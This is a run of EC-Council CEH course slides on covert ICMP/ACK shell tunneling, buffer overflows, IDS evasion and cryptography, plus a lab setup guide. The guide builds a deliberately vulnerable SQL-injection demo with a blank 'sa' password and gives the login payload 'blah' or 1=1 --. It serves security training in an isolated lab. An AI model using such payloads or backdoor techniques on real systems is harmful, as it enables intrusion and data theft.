  • 514. EC-Council Hiding Behind Covert Channel: Loki http://www.phrack.com/phrack/51/P51-06 ~ LOKI2 is an information-tunneling program. LOKI uses Internet Control Message Protocol (ICMP) echo response packets to carry its payload. ICMP echo response packets are normally received by the Ping program, and many firewalls permit responses to pass. ~ We tunnel simple shell commands inside of ICMP_ECHO /ICMP_ECHOREPLY and DNS name lookup query / reply traffic. To the network protocol analyzer, this traffic seems like ordinary benign packets of the corresponding protocol. To correct listener ( the LOKI2 daemon) however, the packets are recognized for what they really are.
  • 515. EC-Council Hacking Tool: 007 Shell http://www.s0ftpj.org/en/docs.html ~ 007Shell is a Covert Shell ICMP Tunneling program. It works similar to Loki. ~ It works by putting data streams in the ICMP message past the usual 4 bytes (8-bit type, 8-bit code and 16-bit checksum).
  • 516. EC-Council Hacking Tool: ICMP Shell ~ ICMP Shell (ISH) is a telnet-like protocol. It provides the capability of connecting a remote host to open a shell using only ICMP for input and output. ~ The ISH server runs as a daemon on the server side. When the server receives a request from the client, it will strip the header and look at the ID field, if it matches the server's ID then it will pipe the data to "/bin/sh". ~ It will then read the results from the pipe and send them back to the client, where the client then prints the data to stdout.
  • 517. EC-Council ACK Tunneling ~ Trojans normally use ordinary TCP or UDP communication between their client and server parts. ~ Any firewall between the attacker and the victim that blocks incoming traffic will usually stop all trojans from working. ICMP tunneling has existed for quite some time now, but if you block ICMP in the firewall, you will be safe from that. ~ ACK Tunneling works through firewalls that do not apply their rule sets on TCP ACK segments (ordinary packet filters belong to this class of firewalls).
  • 518. EC-Council Hacking Tool: AckCmd http://ntsecurity.nu/papers/acktunneling • AckCmd is a client/server combination for Windows 2000 that lets you open a remote command prompt to another system ( running the server part of AckCmd. • It communicates using only TCP ACK segments. This way the client component is able to directly contact the server component through firewall in some cases.
  • 519. EC-Council Honey pots ~ Honey pots are programs that simulate one or more network services that you designate on your computer's ports. ~ An attacker assumes that you are running vulnerable services that can be used to break into the machine. ~ A honey pot can be used to log access attempts to those ports including the attacker's keystrokes. ~ This could give advanced warnings of a more concerted attack.
  • 520. EC-Council Honeypot Software Vendors 1. Back Officer Friendly (http://www.nfr.com) 2. Bait N Switch Honeypot (http://violating.us) 3. BigEye (http://violating.us) 4. HoneyD(http://www.citi.umich.edu/u/provos/honeyd/) 5. KFSensor for Windows (http://www.keyfocus.net/kfsensor/) 6. LaBrea Tarpit (http://www.hackbusters.net) 7. ManTrap (http://www.symantec.com) 8. NetFacade (http://www.itsecure.bbn.com/NetFacade.htm) 9. Single-Honeypot (http://www.sourceforge.net/projects/single- honeypot/) 10. Smoke Detector (http://palisadesys.com/products/smokedetector/) 11. Specter (http://www.specter.ch) 12. Tiny Honeypot (http://www.alpinista.org/thp/) 13. The Deception Toolkit (http://www.all.net/dtk/)
  • 522. EC-Council Summary ~ Intrusion Detection Systems (IDS) monitors packets on the network wire and attempts to discover if a hacker/hacker is attempting to break into a system ~ System Integrity Verifiers (SIV) monitor system files to find when an intruder changes. Tripwire is one of the popular SIVs. ~ Intrusion Detection happens either by Anomaly detection or Signature recognition. ~ An IDS consists of a special TCP/IP stack that reassembles IP datagrams and TCP streams. ~ A simple Protocol verification system can flag invalid packets. This can include valid, by suspicious, behavior such as severally fragmented IP packets ~ In order to effectively detect intrusions that use invalid protocol behavior, IDS must re- implement a wide variety of application-layer protocols to detect suspicious or invalid behavior. ~ One of the easiest and most common ways for an attacker to slip by a firewall is by installing network software on an internal system that usines a port address permitted by the firewall's configuration. ~ Honey pots are programs that simulate one or more network services that you designate on your computer's ports.
  • 524. EC-Council Module Objective ~ What is a Buffer Overflow? ~ Exploitation ~ How to detect Buffer Overflows in a program? ~ Skills required ~ CPU / OS Dependency ~ Understanding Stacks ~ Stack Based Buffer Overflows ~ Technical details ~ Writing your own exploits ~ Defense against Buffer Overflows
  • 525. EC-Council On Oct 19 2000, hundreds of flights were grounded or delayed because of a software problem in the Los Angeles air traffic control system. The cause was attributed to Mexican Controller typing 9 (instead of 5) characters of flight-description data, resulting in a buffer overflow.
  • 526. EC-Council Buffer Overflows ~ A buffer overrun is when a program allocates a block of memory of a certain length and then tries to stuff too much data into the buffer, with extra overflowing and overwriting possibly critical information crucial to the normal execution of the program. Consider the following source code: ~ When the source is compiled and turned into a program and the program is run, it will assign a block of memory 32 bytes long to hold the name string. Buffer overflow will occur if you enter: 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA
  • 527. EC-Council Exploitation ~ Buffer overflow attacks depend on two things: the lack of boundary testing and a machine that can execute code that resides in the data/stack segment. ~ The lack of boundary is very common and usually the program ends with segmentation fault or bus error. In order to exploit buffer overflow to gain access or escalate privileges, the offender must create the data to be fed to the application. ~ Random data will generate a segmentation fault or bus error, never a remote shell or the execution of a command.
  • 528. EC-Council Stack based Buffer Overflow ~ Buffer is expecting a maximum number of guests. ~ Send the buffer more than x guests ~ If the system does not perform boundary checks, extra guests continue to be placed at positions beyond the legitimate locations within the buffer. (Java does not permit you to run off the end of an array or string as C and C++ do) ~ Malicious code can be pushed on the stack. ~ The overflow can overwrite the return pointer so flow of control switches to the malicious code.
  • 529. EC-Council Knowledge required to Program Buffer Overflow Exploits 1. C functions and the stack 2. A little knowledge of assembly/machine language. 3. How system calls are made ( at the level of machine code level). 4. exec( ) system calls 5. How to 'guess' some key parameters.
  • 530. EC-Council Understanding Stacks ~ The stack is a (LIFO) mechanism that computers use both to pass arguments to functions and to reference local variables. ~ It acts like a buffer, holding all of the information that the function needs. ~ The stack is created at the beginning of a function and released at the end of it.
  • 531. EC-Council Understanding Assembly Language Two most important operations in a stack: • 1. Push – put one item on the top of the stack • 2. Pop - "remove" one item from the top of the stack • typically returns the contents pointed to by a pointer and changes the pointer (not the memory contents)
  • 533. EC-Council How to detect Buffer Overflows in a program There are two ways to detect buffer overflows. • The first one is looking at the source code. In this case, the hacker can look for strings declared as local variables in functions or methods and verify the presence of boundary checks. It is also necessary to check for improper use of standard functions, especially those related to strings and input/output. • The second way is by feeding the application with huge amounts of data and check for abnormal behavior.
  • 534. EC-Council Attacking a real Program ~ Assuming that a string function is being exploited, the attacker can send a long string as the input. ~ This string overflows the buffer and causes a segmentation error. ~ The return pointer of the function is overwritten and the attacker succeeds in altering the flow of execution. ~ If he has to insert his code in the input, he has to: • Know the exact address on the stack • Know the size of the stack • Make the return pointer point to his code for execution
  • 535. EC-Council NOPS ~ Attacker pad the beginning of the intended buffer overflow with a long run of NOP instructions (a NOP slide or sled) so the CPU will do nothing till it gets to the 'main event' (which preceded the 'return pointer') ~ Most intrusion detection Systems (IDS) look for signatures of NOP sleds ADMutate (by K2) accepts a buffer overflow exploit as input and randomly creates a functionally equivalent version (polymorphism) ~ Most CPUs have a No Operation instruction - it does nothing but advance instruction pointer. ~ Usually we can put some of these ahead of our program (in the string) ~ As long as the new return address points to a NOP we are OK
  • 536. EC-Council How to mutate a Buffer Overflow Exploit For the NOP portion Randomly replace the NOPs with functionally equivalent segments of code (e.g.: x++; x-; ? NOP NOP) For the "main event" Apply XOR to combine code with a random key unintelligible to IDS and CPU code must also decode the gibberish in time to run decoder is itself polymorphic, so hard to spot For the "return pointer" Randomly tweak LSB of pointer to land in NOP-zone.
  • 537. EC-Council Once the stack is smashed.. Once vulnerable process is commandeered, the attacker has the same privileges as the process can gain normal access, then exploit a local buffer overflow vulnerability to gain super-user access. Create a backdoor Using (UNIX-specific) inetd Using Trivial FTP (TFTP) included with Windows 2000 and some UNIX flavors Use Netcat to make raw, interactive connection Shoot back an Xterminal connection UNIX-specific GUI
  • 538. EC-Council Defense against Buffer Overflows ~ Manual auditing of code ~ Disabling Stack Execution ~ Safer C library support ~ Compiler Techniques
  • 539. EC-Council StackGuard ~ StackGuard: Protects Systems From Stack Smashing Attacks ~ StackGuard is a compiler approach for defending programs and systems against "stack smashing" attacks. ~ Programs that have been compiled with StackGuard are largely immune to Stack smashing attack. ~ Protection requires no source code changes at all. when a vulnerability is exploited, StackGuard detects the attack in progress, raises an intrusion alert, and halts the victim program. http://www.cse.ogi.edu/DISC/projects/immunix/StackGuard/
  • 540. EC-Council Immunix System ~ Immunix System 7 is an Immunix-enabled RedHat Linux 7.0 distribution and suite of application-level security tools. ~ Immunix secures a Linux OS and applications ~ Immunix works by hardening existing software components and platforms so that attempts to exploit security vulnerabilities will fail safe. i.e. the compromised process halts instead of giving control to the attacker, and then is restarted. http://immunix.org
  • 542. EC-Council Summary ~ A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) than it was intended to hold. ~ Buffer overflow attacks depend on two things: the lack of boundary testing and a machine that can execute code that resides in the data/stack segment. ~ Buffer Overflows vulnerability can be detected by skilled auditing of the code as well as boundary testing. ~ Once the stack is smashed the attacker can deploy his payload and take control of the attacked system. ~ Countermeasures include: checking the code, Disabling Stack Execution, Safer C library support, using safer Compiler Techniques. ~ Tools like stackguard, Immunix and vulnerability scanners help securing systems.
  • 544. EC-Council Module Objective ~ What is PKI ~ RSA ~ MD-5 ~ SHA ~ SSL ~ PGP ~ SSH ~ Encryption Cracking Techniques
  • 545. EC-Council Public-key Cryptography ~ Public-key cryptography was invented in 1976 by Whitfield Diffie and Martin Hellman. ~ In this system, each person gets a pair of keys, called the public key and the private key. ~ Each person's public key is published while the private key is kept secret. ~ Anyone can send a confidential message just using public information, but it can only be decrypted with a private key that is in the sole possession of the intended recipient.
  • 548. EC-Council RSA (Rivest Shamir Adleman) ~ RSA is a public-key cryptosystem developed by MIT professors Ronald L Rivest, Adi Shamir, Leonard M Adleman in 1977 in an effort to help ensure internet security. ~ RSA uses modular arithmetic and elementary number theory to do computation using two very large prime numbers. ~ RSA encryption is widely used and is the 'de-facto' encryption standard.
  • 550. EC-Council RSA Attacks ~ Brute forcing RSA factoring ~ Esoteric attack ~ Chosen cipher text attack ~ Low encryption exponent attack ~ Error analysis ~ Other attacks
  • 551. EC-Council MD5 ~ The MD5 algorithm takes as input a message of arbitrary length and produces as output a 128- bit "fingerprint" or "message digest" digest of the input. ~ The MD5 algorithm is intended for digital signature applications, where a large file must be "compressed" in a secure manner before being encrypted with a private (secret) key under a public-key cryptosystem such as RSA.
  • 552. EC-Council SHA (Secure Hash Algorithm) ~ The SHA algorithm takes as input a message of arbitrary length and produces as output a 160- bit " fingerprint" or "message digest" of the input. ~ The algorithm is slightly slower than MD5, but the larger message digest makes it more secret against brute-force collision and inversion attacks.
  • 553. EC-Council SSL (Secure Socket Layer) ~ SSL stands for Secure Sockets Layer, SSL is a protocol developed by Netscape for transmitting private documents via the Internet. ~ SSL works by using a private key to encrypt data that is transferred over the SSL connection. ~ SSL Protocol is application protocol independent.
  • 554. EC-Council RC5 ~ RC5 is a fast block cipher designed by RSA Security in 1994. ~ It is a parameterized algorithm with a variable block size, a variable key size and a variable number of rounds. The key size is 128 bit. ~ RC6 is a block cipher based on RC5. Like RC5, RC6 is a parameterized algorithm where the block size, the key size and the number of rounds are variable again. The upper limit on the key size is 2040 bits.
  • 555. EC-Council What is SSH? ~ The program SSH (Secure Shell) is a secure replacement for telnet and the Berkeley r-utilities (rlogin, rsh, rcp and rdist). ~ It provides an encrypted channel for logging into another computer over a network, executing commands on a remote computer, and moving files from one computer to another. ~ SSH provides a strong host-to host and user authentication as well as secure encrypted communications over an insecure internet. ~ SSH2 is a more secure, efficient and portable version of SSH that includes SFTP, an SSH2 tunneled FTP.
  • 556. EC-Council Government Access to Keys (GAK) ~ Government Access to Keys ( also known as key escrow) means that software companies will give copies of all keys ( or at least enough of the key that the remainder could be cracked very easily) to the government. ~ The government promises that they would hold the keys in a secure way and only use them to crack keys when a court issues a warrant to do so. ~ To the government, this issue is similar to the ability to wiretap phones.
  • 557. EC-Council RSA Challenge ~ The RSA Factoring challenge is an effort, sponsored by RSA Laboratories, to learn about the actual difficulty of factoring large numbers of the type used in RSA keys. ~ A set of eight challenge numbers, ranging in size from 576 bits to 2048 bits are given.
  • 558. EC-Council distributed.net www.distributed.net ~ An attempt to crack RC5 encryption using network of computers world wide ~ The client utility when downloaded from distributed.net runs the crack algorithm as screensaver and send results to the distributed.net connected servers. ~ The challenge is still running...
  • 559. EC-Council PGP Pretty Good Privacy ~ Pretty Good Privacy (PGP) is a software package originally developed by Philip R Zimmermann that provides cryptographic routines for emails and file storage applications. ~ Zimmermann took existing cryptosystems and cryptographic protocols and developed a program that can run on multiple platforms. It provides message encryption, digital signatures, data compression and e- mail compatibility.
  • 560. EC-Council Hacking Tool: PGP Crack http://munitions.iglu.cjb.net/dolphin.cgi?action=render& category=0406 ~ PGP crack is a program designed to brute-force a conventionally encrypted file with PGP or a PGP secret key. ~ The file "pgpfile" must not be ascii-armored. The file "phraselist“ should be a file containing all of the passphrases that will be used to attempt to crack the encrypted file.
  • 561. EC-Council Summary ~ Using Public Key Infrastructure (PKI), anyone can send a confidential message using public information, which can only be decrypted with a private key in the sole possession of the intended recipient. ~ RSA encryption is widely used and is a 'de-facto' encryption standard. ~ The MD5 algorithm is intended for digital signature applications, where a large file must be compressed securely before being encrypted ~ SHA algorithm takes as input a message of arbitrary length and produces as output a 160-bit message digest of the input. ~ Secure Sockets Layer, SSL is a protocol for transmitting private documents via the Internet. ~ RC5 is a fast block cipher designed by RSA Security. ~ SSH (Secure Shell) is a secure replacement for telnet and the Berkeley r-utilities and this provides an encrypted channel for logging into another computer over a network, executing commands on a remote computer, and moving files from one computer to another.
  • 563. EC-Council 2 CEH LAB SETUP v3 Document overview This document provides background information for technical staff responsible for setting up a training room facility for the CEH course. This guide describes the requirements for the network equipment and computer stations that are installed and configured by the facilities personnel for the training courses. Training room environment The training room environment consists primarily of the following equipment: Equipment Number (Class of 12 students) Operating System Minimum System Requirements Student Workstations 12 Windows 2000 Server w/o SP Pentium-based PC with 4 GB free disk space, 128 MB RAM, 1 NIC (disable or unplug extras), 15- inch monitor and cards to drive at 800 x 600 (or at monitor’s native resolution) and configured at 256 colors, and compatible mouse Instructor Station 1 Windows 2000 Server w/o SP Pentium-based PC with 10GB free disk space, 128 MB RAM, 1 NIC (disable or unplug extras), 15-inch monitor and cards to drive at 800 x 600 (or at monitor’s native resolution) and configured at 256 colors, and
  • 564. EC-Council 3 compatible mouse, Wireless Card Instructor Station 1 RedHat Linux 8 or 9 Pentium-based PC with 10GB free disk space, 128 MB RAM, 1 NIC (disable or unplug extras), 15-inch monitor and cards to drive at 800 x 600 (or at monitor’s native resolution) and configured at 256 colors, and compatible mouse Victim Machine 1 Windows 2000 Server w/o SP Pentium-based PC with 10GB free disk space, 128 MB RAM, 1 NIC (disable or unplug extras), 15-inch monitor and cards to drive at 800 x 600 (or at monitor’s native resolution) and configured at 256 colors, and compatible mouse Instructor’s computer The instructor’s computer must: ƒ Be installed with Windows 2000 Professional w/o SP ƒ Be installed with SQL Server 2000 w/o SP ƒ Be running Microsoft Internet Information Server (IIS) ƒ Be running IP protocol. IPX is required if demonstrating NetWare hacking (optional) ƒ Contain all hacking tools from the CD-ROM resident on the hard drive in c:tools ƒ Contain all Windows 2000 source files in c:i386
  • 565. EC-Council 4 ƒ Have PowerPoint, Word and Excel installed ƒ Have Adobe Acrobat, WinZip installed ƒ Install VMWare (Download evaluation registration key from VMWare website) ƒ Have an Overhead Projector connected ƒ Have a CD-ROM as part of its hardware ƒ Set Windows Explorer to show all files and file types and extensions. ƒ The use of Ghost images is recommended to reduce setup time if computer failure occurs. If using Ghost, the Instructor’s computer should have an 8 GB hard drive that consists of a 4 GB FAT partition for NT and at least one other partition on which to store images of the computers. If using NetWare, 1 pc should also be running (optional): ƒ Client 32 version 4.7+ ƒ NWAdmin ƒ RConsole ƒ NetWare administrator user ID = administrator, no password Student workstations Student workstations must: ƒ Be installed with Windows 2000 Professional w/o SP ƒ Be installed with IIS ƒ Be running IP (IPX and NetBIOS compatible protocols required if using NetWare - optional) ƒ Contain all hacking tools from the CD-ROM resident on the hard drive in c:tools ƒ Contain all Windows 2000 source files in c:i386 ƒ Set Windows Explorer to show all files and file types. ƒ Have Adobe Acrobat, WinZip installed ƒ Install VMWare (Download evaluation registration key from VMWare website) ƒ Install Matrix screen saver located in hacking CD-ROMMiscellaneous directory – set the time to 15 mins. ƒ Download the CEH desktop wallpaper from http://www.eccouncil.org/classroom/background.jpg and set up the downloaded image as Windows background wallpaper.
  • 566. EC-Council 5 Victim workstation Victim workstation must: ƒ Be installed with Windows 2000 Professional w/o SP ƒ Be installed with SQL Server 2000 w/o SP ƒ Be installed with IIS ƒ Be running IP (IPX and NetBios compatible protocols required if using ƒ NetWare) ƒ Contain all hacking tools from the CD-ROM resident on the hard drive in c:tools ƒ Contain all Windows 2000 source files in c:i386 ƒ Set Windows Explorer to show all files and file types. Room environment ƒ The room must contain a whiteboard measuring a minimum of 1 yard by ƒ 2-3 yards in length (1 ½ meter by 2-3 meters). ƒ The room should contain an easel and large tablet. ƒ The room must be equipped with legible black and blue felt tip pens (CHISEL-Point, not fine-tip). Classroom configuration The configuration of this classroom is modular. Computers can be added or removed by either row or column, depending on the needs of the particular class. The following is a sample room setup that provides optimal support. This setup allows for ease of access to "troublespots" by the instructor, and allows students to break into functional small and larger teams.
  • 569. EC-Council 9 Set up the machines based on the classroom setup diagram. The lab exercises for the students are instructor led and they are based on the hacking tools in the trainer slides. The instructor is encouraged to demonstrate and guide the students on the usage of the hacking tools against the Victim’s computer. Do not encourage live hacking on the Internet using these tools in the classroom. Please feel free to include your own exercises. Instructor PC Requirements Machine 1 Windows 2000 Server w/ SP0 or SP1 Microsoft SQL Server 2000 Optional: Wireless LAN Card Optional: Wireless Access Points Machine 2 RedHat Linux 7 or 8 Victim Machine Requirements Windows 2000 Server (No service pack) default installation Student Machine Requirements Machine 1: Windows 2000 Server w/ SP0 or SP1 Machine 2: Optional: Machine with CD-ROM bootable Linux
  • 570. EC-Council 12 Network topology The training room must be physically isolated from any production network. Students must be able to access the Internet from their PCs. All computers are connected as one isolated network and domain. The common protocol is IP. All computers should have dynamic IP addresses using DHCP server. This reduces potential problems when booting from Linux bootable CD-ROM. NICs can be 10Mbit or 100Mbit (100Mbit is recommended). Hub is recommended instead of a switch (helpful in demonstrating Sniffer module) Cables must be bundled and tied out of pathways and work areas, and of sufficient length as not to be under stress. Instructor acceptance Before the training class is scheduled to begin, the instructor will visit the training facility to inspect and accept the setup. The technical contact (System Administrator) for the facility must be available to answer questions and correct any setup issues. Both the instructor and the facility technical contact will ensure completion of the following checklists before the training setup is deemed acceptable. Checklists Check the following on all PCs Tick Here List † Open Network Neighborhood. Verify that all classroom computers are visible in Network Neighborhood † Verify that the Windows OS source files are on the computer in c:i386. † Verify that the hacking tools are on the computer in c:tools. † Verify that Internet access is available. † Visit http://www.eccouncil.org and view the page to check Internet access. † Open Command Prompt and type ping eccouncil.org and look for connection to the server. † Verify Microsoft PowerPoint, Word, Excel are installed.
  • 571. EC-Council 13 † Verify Acrobat and Winzip are installed. † Verify that the Instructor computer can image through the overhead projector. † Verify each computer has 2 GB or more free disk space. † Verify Windows Explorer is set to show all files and file type including hidden files and extensions. † Verify if you can successfully boot using CD-ROM bootable EC-Council Linux CD-ROM † Cable Wiring organized and labeled † Student Workstations and chair placement satisfactory † Placement of LCD (overhead) projector appropriate † Whiteboard and dry erase markers and eraser are available † Instructor station properly organized and oriented † Computers are labeled with client number. † EC-Council courseware’s available for students. † Write down the facility’s technical contact person’s hand phone number. Contact him in case of network problem. † Verify the configuration of CEH wallpaper on the desktop – black background with CEH logo at the center † Test the “Matrix” screen saver.
  • 572. EC-Council 10 Training Duration and Breakdown Number of recommended days required for CEH training: 5 (9:00 – 5:00) class Topics Breakdown: Day 1 Ethics and Legal Issues Footprinting Scanning Enumeration Day 2 System Hacking Trojans and Backdoors Day 3 Sniffers Denial of Service Social Engineering Session Hijacking Day 4 Hacking Web Servers Web Application Vulnerabilities Web Based Password Cracking Techniques SQL Injection Hacking Wireless Networks Day 5 Virus and Worms Hacking Novell (Optional Module) Hacking Linux IDS, Firewalls and Honeypots, Buffer Overflows Cryptography
  • 573. EC-Council 14 Lab Exercises Practice and understand how these tools work by reading the documentation accompanying the tool. Conduct the following module exercises in the classroom. Install Command Prompt Here tool. This shell extension adds a CMD Prompt Here command to the context menu that is available when you right-click in the Folders (left) pane of Windows Explorer. Selecting this option from the context menu creates a new command-prompt session with the same path as that of the object that is right-clicked. Installing CmdHere To install CmdHere: 1. In Windows Explorer, navigate to the <CD- ROM>Miscellaneous 2. Right-click DOSHERE.INF. 3. On the resulting pop-up menu, click Install. Now you can open any directory in command prompt. For example to open <CD-ROM>System Hacking directory in Command prompt, simply right-click the System Hacking directory and select Command Prompt Here
  • 574. EC-Council 15 Module 1: Legality ƒ Ask the student to read the “Ethical Hacking Agreement.doc” Module 2: Footprinting ƒ Whois (Linux CD-ROM) ƒ http://tucows.com ƒ Hacking Tool: Sam Spade ƒ NSLookup ƒ ARIN ƒ Traceroute ƒ Hacking Tool: NeoTrace ƒ Visual Route ƒ Visual Lookout ƒ Hacking Tool: Smart Whois ƒ Hacking Tool: eMailTracking Pro ƒ Hacking Tool: MailTracking.com Module 3: Scanning ƒ Hacking Tool: Netscan Tools Pro 2000 ƒ Hacking Tool: Hping2 (Linux CD-ROM) ƒ Hacking Tool: netcraft.com ƒ Hacking Tool: nmap (Linux CD-ROM) ƒ Hacking Tool: HTTrack Web Copier ƒ SolarWinds Toolset ƒ NeoWatch ƒ Hacking Tool: Cheops (Linux CD-ROM) Module 4: Enumeration ƒ NetBIOS Enumeration ƒ Hacking Tool: DumpSec ƒ Hacking Tool: NAT ƒ Hacking Tool: User2SID ƒ Hacking Tool: SID2User ƒ Hacking Tool: Enum ƒ Hacking Tool: UserInfo ƒ Hacking Tool: GetAcct Module 5: System Hacking ƒ Legion ƒ VisualLast ƒ Hacking Tool: L0phtCrack
  • 575. EC-Council 16 ƒ Hacking Tool: GetAdmin ƒ Hacking Tool: Rootkit ƒ MD5 Checksum utility ƒ Auditpol ƒ Hacking Tool: Elslave ƒ Hacking Tool: Winzapper ƒ Hacking Tool: Evidence Eliminator ƒ NTFS File Streaming ƒ Hacking Tool: Snow ƒ Hacking Tool: Camera/Shy Module 6: Trojans and Backdoors ƒ Hacking Tool: Tini ƒ Hacking Tool: Netcat ƒ Hacking Tool: NetBus ƒ Packaging Tool: Microsoft WordPad ƒ Hacking Tool: Whack a Mole ƒ fPort ƒ TCPView ƒ Process Viewer Module 7: Sniffers ƒ Hacking Tool: Ethereal (Linux CD-ROM) ƒ Hacking Tool: Ettercap (Linux CD-ROM) ƒ Hacking Tool: EtherPeek ƒ Hacking Tool: ArpSpoof (Linux CD-ROM) ƒ Hacking Tool: DSniff (Linux CD-ROM) ƒ Hacking Tool: Macof (Linux CD-ROM) ƒ Hacking Tool: mailsnarf (Linux CD-ROM) ƒ Hacking Tool: URLsnarf (Linux CD-ROM) ƒ Hacking Tool: Webspy (Linux CD-ROM) ƒ Hacking Tool: WebMiTM (Linux CD-ROM) ƒ Hacking Tool: Cain and Abel ƒ Hacking Tool: Packet Crafter ƒ Hacking Tool: WinSniffer Module 8: Sniffers ƒ Hacking Tool: Ping of Death ƒ Hacking Tool: Freak88 Module 9: Social Engineering ƒ Ask the student to read “Social Engineering-story.pdf” ƒ Play the Kevin Mitnick Video ƒ Demonstrate Hotmail Social Engineering Module 10: Session Hijacking ƒ Hacking Tool: T-Sight ƒ Remote TCP Session Reset Utility Module 11: Hacking Web Servers ƒ Hacking Tool: Jill32 ƒ Hacking Tool: IIS5-Koei ƒ Hacking Tool: IIS5Hack ƒ Network Tool: LogAnalyzer ƒ Hacking Tool: IISExploit
  • 576. EC-Council 17 ƒ Hacking Tool: WB ƒ UpdateExpert ƒ Cacls utility ƒ Network Tool: Whisker ƒ N-Stealth Scanner ƒ Hacking Tool: WebInspect ƒ Network Tool: Shadow Security Scanner Module 12: Web Application Vulnerabilities ƒ Using Google to Inspect Applications ƒ Hacking Tool: Instant Source ƒ Hacking Tool: Jad ƒ Hacking Tool: Lynx ƒ Hacking Tool: Wget ƒ Hacking Tool: Black Widow ƒ Hacking Tool: WebSleuth Module 13: Web Based Password Cracking Techniques ƒ Hacking Tool: WebCracker ƒ Hacking Tool: Brutus ƒ Hacking Tool: ObiWan ƒ Hacking Tool: Munga Bunga ƒ Hacking Tool: Varient ƒ Hacking Tool: PassList ƒ Hacking Tool: CookieSpy ƒ Hacking Tool: SnadBoy Module 14: SQL Injection (See How to setup the SQL Demo scripts) ƒ blah' or 1=1 ƒ Hacking Tool: SQLDict ƒ Hacking Tool: SQLExec ƒ Hacking Tool: SQLbf ƒ Hacking Tool: SQLSmack ƒ Hacking Tool: SQL2.exe Module 15: Hacking Wireless Networks ƒ Hacking Tool: NetTumbler ƒ Hacking Tool: AirSnort ƒ Hacking Tool: AiroPeek ƒ Hacking Tool: WEP Cracker ƒ Hacking Tool: Kismet ƒ WIDZ- Wireless IDS Module 16: Virus and Worms ƒ How to write your own Virus? Module 17: Novell Hacking ƒ Novell Hacking is Optional Module 18: Linux Hacking ƒ HPing2 as Trojan ƒ Hunt ƒ Nessus ƒ Advanced Nmap
  • 577. EC-Council 18 ƒ Linux Rootkits ƒ IPChains and IPTables Module 19: IDS, Firewalls and Honeypots ƒ SNORT ƒ Hacking Tool: fragrouter ƒ Hacking Tool: TCPReplay ƒ Hacking Tool: SideStep ƒ Hacking Tool: NIDSbench ƒ Hacking Tool: ADMutate ƒ Honeypot Trapserver Module 20: Buffer Overflows ƒ Writing your own Buffer Overflow Exploit in C ƒ StackGuard ƒ Immunix Module 21: Cryptography ƒ PGP ƒ SSH ƒ Encryption Cracking Techniques How to setup the SQL Demo Scripts for SQL Injection Module 1. The SQL Demo scripts are located in the directory <CD-ROM>Module 14 – SQL InjectionSQL demo scripts 2. Make you have SQL Server 2000 is installed. 3. The default user account/password for SQL Server should be sa and no password 4. Create the Juggybank database. Execute the script juggybank.sql script located in <data> directory using SQL Query Analyzer 5. Setup a System DSN in control panel name it as juggybank. The login.asp refers to this DSN for accessing the database. 6. Populate the Userinfo table with data from juggybank- userinfo-data.txt file manually or using the bcp import utility. 7. Populate the CreditCard table with data from juggybank-creditcard-data.txt file 8. Set SQL Server to Mixed Authentication mode using SQL Server Enterprise Manager. 9. Publish the <CD-ROM>Module 14 – SQL InjectionSQL demo scripts in IIS as virtual directory called SQLInjection. 10. Ensure IUSR_COMPUTERNAME account has read access to all the files in this virtual directory. 11. Configure SQLInjection virtual directory for directory browsing in IIS.
  • 578. EC-Council 19 12. Test the script by running the following in Internet Explorer: o http://localhost/sqlinjection/index.htm o http://localhost/sqlinjection/client.htm ƒ Login in as Username joker with password joker -or- Login in as blah’ or 1=1 -- ƒ You should see bank’s Account Summary page o http://localhost/sqlinjection/client2.htm ƒ This URL contains larger Login input fields. You can try advanced SQL injection techniques by using this page like resetting IIS etc o If you don’t see the bank page then it must be permission problem. Check your settings again. Assistance: If you have problems or require assistance in setting up the Lab for your CEH class, please e-mail support@eccouncil.org